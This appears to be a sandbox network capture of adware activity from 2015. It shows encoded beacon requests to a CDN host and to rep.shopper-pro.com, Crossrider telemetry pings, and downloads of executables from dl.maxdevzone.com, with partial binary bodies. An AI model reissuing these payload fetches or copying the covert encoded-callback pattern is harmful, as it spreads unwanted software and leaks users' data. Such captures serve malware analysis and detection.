Date: Thu, 13 Aug 2015 11:18:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF1B5eyhynK5il gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBd7kwVzNWOrfuirThnOyWCqILJt Jqyltk= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF0vmoXMQKU1KtudqV021AKZU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=oE Olq3N8DJENRlsCDLYcDgfC1V7eKoWgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEaTBgykGtBXjxBAEp0wLfKOcXM978RrvxgTxIUcsgQ w0eteH8KxBtakHX utQO2t7GJ7NLKRj9nU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=j7YMo/n29XMVCZIctrluXs30ehTmVX1mzeUpkoQZA95XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp1pO0uZjbwWll7Nx/213VNE6JXbpA88dZXJ6A7OzALu5zbBYCuaAtAvGkllEOJq0sp3jz2it1PuY hmSQlakOO/yw2dOqRz0VTJIBlhaXll/jgb6v7cXpPsHbyM38hHiddP9Uf4p/RQ UMx9TNBbmkTjcSbV/8/K3y93eDbW4 bAU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=N6dOqWm8Q95rOakOyNRzsN5jOExRmJjcpL1q0D3vvXQ2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRo0ATae6NSkcvIROPie2z40 X0A62pnUj3KYX3Ti/i3YOBks urBi 1VbQfHq0QVBDarxXN1e/eRVfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXe5MFczVjq37oq04ZzslgqiCybfiaspbZ HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=c0XmKevqA0lENRlsCDLYcGeakDLP0HwkgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEdPIgADxit2gnbJKYwPfuhCWcSucRpHa5xQC drCF7eFc68xQtOPoFeZZ3F95gs6nEVdjbbwQnHyVtB8erRBUENoBUzXpAW/ CSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qL38Km4JMgAXQ== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=W5y9y1UrGBkT/daslwwbUi1X0eix9R7PaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2BNfh4qpckIN6kO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFaACykertHSFfOKWYd4uGNAB/MXM5vy8Es IILilpWF3E4CvODJISMmgJ1E0DOBKFm3OtmTG7fpbuOInD4IpbV04k1C4lssAWX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=Feo0TQZfu6KSwU3ck0YwnkQ1GWwIMthwsNv  oCoFDuAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRbrsFepywjbPfV9OCtHXZfA3mXJEY39mHAhwsRGINruhhsseF9XKGr8l4l5 9UEJ lex/kVKG eu03e5/1jzsDq/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGd51jxu8kbC2zsHlRkWrcy9e991jqD0JbjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2AUI/TbDoS6cQ== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:29 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=2fVCHF6kf8jCiOnT8Um5ot5jOExRmJjcwBNQmbxWl5I2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRoA0zlVyT prKPFGXl7hYw KKij  6dP1w7xUocEPa3glNDBcek3F/63nckoxBum7JNDqm5t3h0H90W4JQdY9P0gBy5EtCsvUaNdTeugB sfRAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0l7tPOkkeUv HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:29 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=1ZEnpGuz/ISSsSz5Gin3Vt5jOExRmJjc8f9/KvgcVLM2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRopynfaNYH8L/fV9OCtHXZfA3mXJEY39mHAhwsRGINrujU8aLWOIyJUH8YWruN4e6MEbymkiujpsVTxWhzXOleYJkIdnqYjudekgj0wc9eDMUnCmQO3a9dMJOXaRLeTy 6CAOOMT3NqqJO9TngHSIOj44034t1Q4pu3fndBZnH/Wk11N66AH6x9ECOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/  a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:31 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=ZfTZC8DxP8YF7tXbo2OpjW4qNgpZFK9FKB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOObhfXDxmrTSK7QblguX5JvoeC1e2SDVtV0Et4u7lqt3sALWQVKcMZfCF1xI06rglXZ6Eeh5vZKO2eqfOL09Waq7Jn1GegIILyOsrHZsRsIfMRhg0WUsz0Xly/L51iHZ9r5N1eAbd3t0uTl0SfHFTsacMteo8rnbW10COCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/  a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /app/ping.ashx?e=KC52kqqAunAF7tXbo2OpjYavQM3IkVbX2YTeaOaZJPFysSIQM/WMqhsgZm851Wm705cEc0dFwLhTxWhzXOleYCZCp63jGZtjv06NRyXKgtkdRS7ocO43fkEXlTeNLX sfKwlC2TeCg7lnoGCEF1IIyQxWeZ2hMdUZrdGZ5CXclVTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PNsA1iuxLaBHdtdgGHkZrI4k4Gm5vvSsk7q1DqDoShwFmblcMjHXRdicB7EPPnRdOUS4717SFgKd6j7/wRBDsRoqvWX6JwkejqMehRdfaX6iZYn8TH3Pe3MlW9RFqOniqVRDsrPlqwdmkLLb35jLfrVLutmednZNQ== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 11:19:33 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=2UW/O98m6H8F7tXbo2OpjW0n2MBpLjeO2YTeaOaZJPFysSIQM/WMqhsgZm851Wm705cEc0dFwLhTxWhzXOleYCZCp63jGZtjv06NRyXKgtnU2Z1SyzBY81o8H6qezB8RqTFlxlzn4VKX1U8GGWeNj61SjtAHPTC3QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiYoYL3r 4idOA8Kj6Mu8v3vRYAGA yJTjm4X1w8Zq00iu0G5YLl Sb6QG6vuKMEZ8b/AUix4dIkZvQPHab7QXjtoXNw24za1vD4WpTRkXhg7nV3/LPfa2aq5oeRu5C4CqkWleu6Ut5wZJLhm4jKngLIPSVmnMg23wA= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 11:19:34 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=WL9usJOVMsOEyHZoFFyrCAXu1dujY6mNj6To0cJP4sHZhN5o5pkk8XKxIhAz9YyqGyBmbznVabvTlwRzR0XAuFPFaHNc6V5gJkKnreMZm2O/To1HJcqC2WadpT4UtSGCs4164GCUCrHofaoyXCfoQHfnxDGMvPkm88zk3vjcmKS6F3bO0r3toDYVc3vn XSLjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsNd jErBGkiDqZpQuUsyuErvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qJg4GZE0lzROYY2d48H/jH53sGqR1dd1 CYgbDq2EyqHZXiNwermIPJaqcLsqnN14kxDoAIuanBxUzm JXfFf4aShZXLko8QlU= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 11:19:35 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=WL9usJOVMsOEyHZoFFyrCAXu1dujY6mNj6To0cJP4sHZhN5o5pkk8XKxIhAz9YyqGyBmbznVabvTlwRzR0XAuFPFaHNc6V5gJkKnreMZm2O/To1HJcqC2TQDvlMwbi/4Fsp1Rvh9JTeKcWyRatcCZS5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAc/1td01976VC51CUbXbhryEU5MDCXDxgXe5MFczVjq37oq04ZzslgqiCybfiaspbZo2Pjw4zIP8Koiz5XsOzoJG5lkiLn 2iON4UrLMQQDZPMFopdoQp3MXCrArhn8sH AS7DCm3ZJZeNpBJRUpe7bX0UJxZodl69 HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 11:19:35 GMT
Content-Length: 0



GET /spdbt/shoppy/snsch7.exe_a HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache



.........................................................|g......yd...
u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u.
..u...u...u...u...u...u...u...u...u...u...u..~i......{f...u...........
......................................................................
..................................j......|g...u.......................
......................................................................
......................k......~i...u...................................
......................................................................
..........m.......j...u...............................................
....................................................................n.
......k...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...
u...u...u...u...u...u...u...u...u...u...t...s...r...p...o...n...m.....
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..............................(.......0..... .....`...................
......................................................................
............................q...o...n...l...j..~h..{f..yd..vb..t`..p].
.mZ..jX.{gU.xdS.uaQ.r_O.o]M.n\L.n\L.n\L.n\L.n\L.n\L...r...............
..................................................................
<<< skipped >>>


GET /web/gf/all/setup.exe_d HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:19:25 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439433377"
Last-Modified: Thu, 13 Aug 2015 02:36:17 GMT
Cache-Control: max-age=1268
Content-Length: 2124006
Content-Type: text/plain
X-HW: 1439464766.dop002.am4.t,1439464765.cds048.am4.c
..'.[....VS.i............d.q.V.35......Bs...dr.1.6rO!....].....W.... :
V.......:e"R..D.C...]8...@>... !.n...|.&-n. ln/....8.^_"..../.05Y..
=K.C...._.Lt.........s/.m.l.....a?A..P5fl . ...j...(....e........5 td.
-..KT.`..&...(jG.%.G..e..8G.w[..."....AT..d....4..d...Dzp.........._..
>.......\..,..=[.R.r?.n....q.L.s.....od..t[....F.._K........tV|}^..
.[.W.*ER..ueEC..5.C.M........B..u..o.sk.....a.....u@]..p..... ..O.L...
Xcj.s............;Z...BWO...3/t....h...|.TB..^.. ...s=. ..y.M...a\. ..
../... #.;.::.......*....s'.W.....!.KJ....9D.(...O~....m.n...O.E.....z
`.*E.....l...>....Un.....|....Sn.dm>...3.5....Y.Ug ~....C}..V...
.j..W.....R...T<.HT......_G.!.......Pl.x....[d.A..~#.h.0.|X.$..P&..
.z.. ,Aa.U...`zv_o....G...V_f]{..r.........L.~g......P.,II....9z..!...
.)...K..3 b...X.}P...|.L.-.:....b.(..U..............|...y.(.z..5..={.i
.?L.......Al{..I.6.Rc-.9.....%.\.-t.. .VK......*.[9,.L}{C..m"$....4~..
..o..;>i.X/S/.~.*.)VV.._k.V`[email protected]..)...s..n.Ss8.v\B\.Q....7.5..
....)..?`.D"...7>....j& ..D...A...0.......L...i...H.0.....y.....y..
..:2..>.......T.}L.f0=.'.?..K..`.Fr.<..Q.|....;."t..D....w6..8G.
..=........../j!...k.X.X.g...h'..k...Qr\...x#.8.`j]0E!./....<.Ry.-.
....l.j%...B...&...."q........2.p...q.""..#L..n<6...0{;.Q...A.....Z
.^=.N.,...G.]>1...}t.g..m.......$z........a. .ny.?.._..yu*...YG.y.&
lt;.....NAi....\_.Ug..?.9b-........o.C".>..#k&oO...b.x....O.K.(..t.
q...a..P.(.pz......Sr.on~..;............"........\I..b.....b.A.682....
P.cg....R../r[|[email protected]#i. [email protected]>
<<< skipped >>>


GET /utility.gif?report=fdata&f=3&c=1729&i=10&n=ms_started&rnd=19871 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:21 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Server: ng
inx/1.6.0..Date: Thu, 13 Aug 2015 11:19:21 GMT..Content-Type: image/gi
f..Content-Length: 43..Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT..C
onnection: close..GIF89a.............!.......,...........L..;..



GET /utility.gif?report=fdata&f=3&c=803&i=35&n=ms_about_to_exc&rnd=25324 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:31 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..



GET /utility.gif?report=fdata&f=3&c=1729&i=20&n=ms_start_download&rnd=16011 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:22 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..



GET /10266.ashx?e=NdvkYMTo1KsT/daslwwbUrln8Tc7JdzDaMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLxpJZRDiatLLr8onAm2k8 UCN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DTTuHrYVulo109x0h yMmOuOY6cLwcbD07lG1xkeY5jbRwdqu9soHjYgwamV62X9gO95zWp5ecIePiKgomzd5XT9xoSCfVrLCPk3SNaw1Hwyh7Gcj1ILXhdtXANK2UVVldUmBhCw8CHnrErQ9Bnn0aGNDEgQGSeDWcuFD/oqMC4ywj137NFRjrrStcIq/vZyTdriV4mPeB3fQbFCQv5BK9FdmE/yeJSe6i5CWtbGsRuHfTuvFpnVrlF9LGvMrDlXCLGhXnLEz5pbP YAvZ/SRS XEWbcA1chWcCJK1OHTiKZmXIkKgXd7TGpnBktR0W195FKDVXPs8UDrf7gVRTtqGyUpmLFbLFiWF8xS3bBaukC3g671NSdAWbPZE8t0P6yGa vpLH0m0oO jwDV6udpLox4w9PSLDKW3MoS/fu50NKaR9WivOCmrDK2XoJ06HUM62z6JB0wq6Xw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:29 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /spdbt/shoppy/snsch7.exe_d HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache



....&L...h..A.....Cy.B....6......e..:..G.J...9.sS.Q~.........6..'.M..F
AP..d...5.\0..._.>...8.C....<.y...._y)...zC4.<L...P.C....D...
.Y...C..f..s...$.>.x.6`......o....#...N...P."d.3!..3....6...zu...ut
./.......Z.{.o.....L..a ....o......w$.Q}...qfW.f5.......5...? (.;.QI76
.......0.Kpt.\...b$...L .........p=...?. ....T...(,.9....Hx.z..1C.3...
.C..U].k.c..A.oM......:.....u F("...VV.....d...j..!...Q.)r{.q./Z.4....
..q..pK..j....<...Qj.x......-..[)..\..O^....@\........p.qU...p:[.l[
.A(o..jvz..eRX....z.M.sn...e/|.U.4^@.....r....p.ZF..f.X...9S?.....X...
t..k....YDCQ......v..6..W...Te....-%Z...9!H\.../..U.x..MNu|...d.G..G.{
.p...R.......Mf.$P..[...X.....~...ar.$c.Fa....y...,.....B&*p...vK...i.
%.p.H.ve...q.k..j...s..s.........;.._...Ru...L\..PG..........m...^..6.
..eh(9.c..3p.*..h..;jAv.tzK ..L..{-....y...0u....HOr......&.q.S.d.....
l.H....r....7...(..J.}...i..J..?..........L....4/..8ON..[F..k.qJ..4>
;I.B^.ke0... h.P..Rpx...".$._n.n]J\ ......h.>e:.....c....nC.....n..
.....,....>."...'...:.x>,....?..3..K[.p..Z..~..........m.I.x.L..
..z..x.......uGD.........T{f%.......Y.....IV.* .8.*.P..-...7..|P...1..
......G..\..)&.....yZ.7..vEi5..9E..69;..".k......a.OY;.l....I.A..dJ?..
...[.'.{O....]..C.....A"h.fTM...j?.)CN.f..a`....K.lH..\a...1.#9....].F
...\[email protected]..$.d...2..Jk.8X.%.-.O.H\.ISZ..T3..-.'j...`......p-?.kW.
...< .iq.a.Z.....m*U....a@<:5.;.x|.....F[..E.... U....r.......Z.
..0.i}.'..=...ze."["..:...u.......*=...V..~..H.G.{....K....Ao.c;P....K
M.1.Q.. O....|...vG..p".6w.U1.Q..J..D.5.<;... .V...j$.&./....dn
<<< skipped >>>


GET /27136.ashx?e=bNFVvuIwcz4F7tXbo2OpjbeGOAxO2gKXKB2ZKuKuT4UgLxC0aXqYrUEev CIr75kJRiOVUDkXyMY3q3Uh zLol JfVwpv1Wv16XIqLxILHtgx1Ht egA6cURUFmYOWrgEoo okeITCw2Yh 7VFNWqMTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5emS9jXjFgnw= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=bNFVvuIwcz4F7tXbo2OpjbeGOAxO2gKXKB2ZKuKuT4UgLxC0aXqYrUEev CIr75kJRiOVUDkXyMY3q3Uh zLol JfVwpv1Wv16XIqLxILHtgx1Ht egA6a3os1yMNpRFGzy5vsTaNP0Nk8MlICEx8OzO9WsNY04szUJdC7lWxx5CAq2jnzLstq5zRXoJTpQbEJGlPGkXT zLSflwInKoSsTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5emS9jXjFgnw= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=LCnUzM5l8JKBkxMrsxJdJt5jOExRmJjc8lXlmdaIM2I2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRo74r1XQZFERKtK2nLIJE3nATxIUcsgQ witsIrAYx7ljhVOZjHwNmMDyjESsfx8vmmA9cYundBgRv3w3Jj7cm/ gp01/jAfMwbSGNlrViJV74d 8wlC3ACe dC6ehZq jU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:25 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FeOeKyAVWvB29uUFvnzEUAw6Bvyoe0Pz471eJrDcTa7BC1GOPVXIjHvBX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
